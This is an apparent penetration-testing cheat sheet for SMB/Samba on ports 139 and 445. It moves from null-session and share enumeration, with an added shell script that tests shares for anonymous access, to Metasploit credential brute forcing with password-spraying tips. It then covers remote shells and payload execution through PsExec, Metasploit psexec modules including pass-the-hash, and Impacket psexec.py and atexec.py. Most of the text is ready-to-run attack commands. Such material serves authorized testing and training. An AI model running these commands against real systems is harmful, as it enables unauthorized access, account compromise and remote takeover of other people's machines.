Port 139 and 445 - SMB/Samba
How to enumerate port 139/445 (SMB)
Samba is a service that lets users share files with other computers. It is interoperable, meaning it can share files and printers between Linux and Windows systems: a Windows user simply sees a folder icon containing some files, even though the folder and files actually live on a Linux server. SMB listens on TCP 139 when carried over NetBIOS and on TCP 445 when run directly over TCP, which is why the two ports are enumerated together.
nmblookup - a NetBIOS over TCP/IP client used to look up NetBIOS names (-A queries a host by IP address for its NetBIOS name table):
nmblookup -A 192.168.1.101
List shares:
smbmap -H 192.168.1.101
nmap --script smb-enum-shares -p 139,445 192.168.1.101
Check for Null Sessions:
smbmap -H 192.168.1.101
# rpcclient: a tool to execute client-side MS-RPC functions (-U "" = anonymous/null user, -N = no password)
rpcclient -U "" -N 192.168.1.101
# smbclient: an ftp-like client to access SMB shares (-L lists shares, -N suppresses the password prompt so the connection is attempted as a null session)
smbclient -N -L 192.168.1.101
smbclient -N \\\\192.168.1.101\\[share name]
Nmap scan for vulnerabilities (quote the pattern so the shell does not expand the wildcard against files in the current directory):
nmap --script "smb-vuln*" -p 139,445 192.168.1.101
enum4linux enumerates various SMB functions, such as:
- output similar to nmblookup
- check for null session
- listing of shares
- domain info
- password policy
- RID cycling output
enum4linux -a 192.168.1.101
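As an added example (not part of the original cheat sheet), the shell wrapper below strings the null-session checks together: it parses the share table printed by `smbclient -N -L`, then tries an anonymous `dir` on each share and reports which ones are readable without credentials. The rpcclient sub-commands (`srvinfo`, `enumdomusers`, `getdompwinfo`), the function names and the embedded sample listing are my choices, not from the page; the sample is constructed so the parser can be exercised offline.

```shell
#!/bin/sh
# Added example, not from the original page: a small wrapper around the
# null-session checks. parse_shares() turns `smbclient -N -L` output into
# one share name per line; try_null_session() then attempts an anonymous
# directory listing of each share. Only parse_shares() runs offline; the
# other functions call the real tools against a live target.

# Extract share names from `smbclient -L` output read on stdin.
# The share table starts at the "Sharename ... Type" header; rows are
# indented, so the table ends at the first blank or unindented line.
# Share names containing spaces are not handled (check those by hand).
parse_shares() {
    awk '
        /^[[:space:]]*Sharename[[:space:]]+Type/       { in_table = 1; next }
        in_table && /^[[:space:]]*-+[[:space:]]+-+/    { next }
        in_table && (NF == 0 || !/^[[:space:]]/)       { exit }
        in_table                                       { print $1 }
    '
}

# Try an anonymous listing of one share; prints "<share>\tACCESSIBLE|DENIED".
try_null_session() {
    target=$1
    share=$2
    if smbclient -N "//$target/$share" -c 'dir' >/dev/null 2>&1; then
        printf '%s\t%s\n' "$share" ACCESSIBLE
    else
        printf '%s\t%s\n' "$share" DENIED
    fi
}

# Full null-session sweep against one host (hypothetical wrapper name).
enum_smb_null() {
    target=$1
    nmblookup -A "$target"
    rpcclient -U "" -N "$target" -c 'srvinfo;enumdomusers;getdompwinfo' 2>&1
    smbclient -N -L "$target" 2>/dev/null | parse_shares | while read -r share; do
        try_null_session "$target" "$share"
    done
}

# Constructed sample of `smbclient -N -L` output (not captured from a real
# host), used to exercise parse_shares() without a target.
SAMPLE_SMBCLIENT_L='
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share           Disk      
	backups         Disk      Nightly dumps
	IPC$            IPC       IPC Service (Samba 4.13.17)
SMB1 disabled -- no workgroup available
'

# Share names from the sample, space-joined, for the offline check.
sample_share_names() {
    printf '%s\n' "$SAMPLE_SMBCLIENT_L" | parse_shares | tr '\n' ' ' | sed 's/ $//'
}

# Usage: ./smb_null.sh 192.168.1.101
if [ $# -gt 0 ]; then
    enum_smb_null "$1"
fi
```

IPC$ is always listed and is what a null session binds to; ACCESSIBLE on a Disk share is the interesting result, since it means files can be pulled with no credentials at all.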
Detect SMB version (Metasploit):
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.101
RHOSTS => 192.168.1.101
msf auxiliary(scanner/smb/smb_version) > run
[*] 192.168.1.101:139 - Host could not be identified: Unix (Samba 2.2.1a)
SMB brute force:
This module tests an SMB login on a range of machines and reports successful logins. Check the password policy first (enum4linux prints it): a low lockout threshold means a long password list will lock accounts out, so keep the list short or spray a single password across many users instead.
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.1.101
msf auxiliary(scanner/smb/smb_login) > set USER_FILE /root/Desktop/users.txt
msf auxiliary(scanner/smb/smb_login) > set PASS_FILE /root/Desktop/passwords.txt
msf auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
msf auxiliary(scanner/smb/smb_login) > run
Connecting with PsExec:
PsExec.exe is a Sysinternals tool for running processes on other machines in a network. It drops you straight into a shell on the remote PC with no manual setup: it copies its PSEXESVC service binary to the target's ADMIN$ share over SMB, starts it through the Service Control Manager and relays input and output over a named pipe. It therefore needs credentials with administrative rights on the target, and the service installation and PSEXESVC.exe on disk are well-known detection points. Download it from http://download.sysinternals.com/files/PSTools.zip.
# After extracting the archive, run:
PsExec.exe \\192.168.1.101 -u administrator -p [password] cmd
Connecting with PsExec (Metasploit):
If you have SMB credentials you can use psexec to log in easily. You can use either the standalone binary or the Metasploit module.
Windows Authenticated User Code Execution:
This module uses a valid administrator username and password (or password hash, passed as LM:NTLM in SMBPass) to execute an arbitrary payload. It is similar to the psexec utility provided by Sysinternals.
msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set RHOSTS 192.168.1.101
msf exploit(windows/smb/psexec) > set SMBUser administrator
msf exploit(windows/smb/psexec) > set SMBPass [password]
msf exploit(windows/smb/psexec) > exploit
Windows Authenticated Powershell Command Execution:
This module uses a valid administrator username and password to execute a PowerShell payload using a method similar to the psexec utility provided by Sysinternals. The payload is base64-encoded and passed to powershell.exe on the command line with the -EncodedCommand flag. The payload is therefore never written to disk, and because each generated payload is unique it is less prone to signature-based detection (PowerShell script block logging and the long encoded command line are still visible to defenders).
msf > use exploit/windows/smb/psexec_psh
msf exploit(windows/smb/psexec_psh) > set RHOSTS 192.168.1.101
msf exploit(windows/smb/psexec_psh) > set SMBUser administrator
msf exploit(windows/smb/psexec_psh) > set SMBPass [password]
msf exploit(windows/smb/psexec_psh) > exploit
Connecting with PsExec (Python):
Impacket psexec.py:
psexec.py lets you execute processes on remote Windows systems, copy files to them, process their output and stream it back. It gives a full interactive remote shell without installing any client software on the target (like PsExec, it uploads a service binary over an admin share and starts it, so the same SMB and service-creation artefacts appear).
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python setup.py install
cd examples
# Syntax: [domain/]user:password@target
python psexec.py SERVER/Administrator:[password]@[target]
Impacket atexec.py:
This tool executes a command on the target machine through the Task Scheduler service (a scheduled task is created, run and deleted) and returns the output of the executed command.
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python setup.py install
cd examples
python atexec.py SERVER/Administrator:Ignite123@192.168.1.104 systeminfo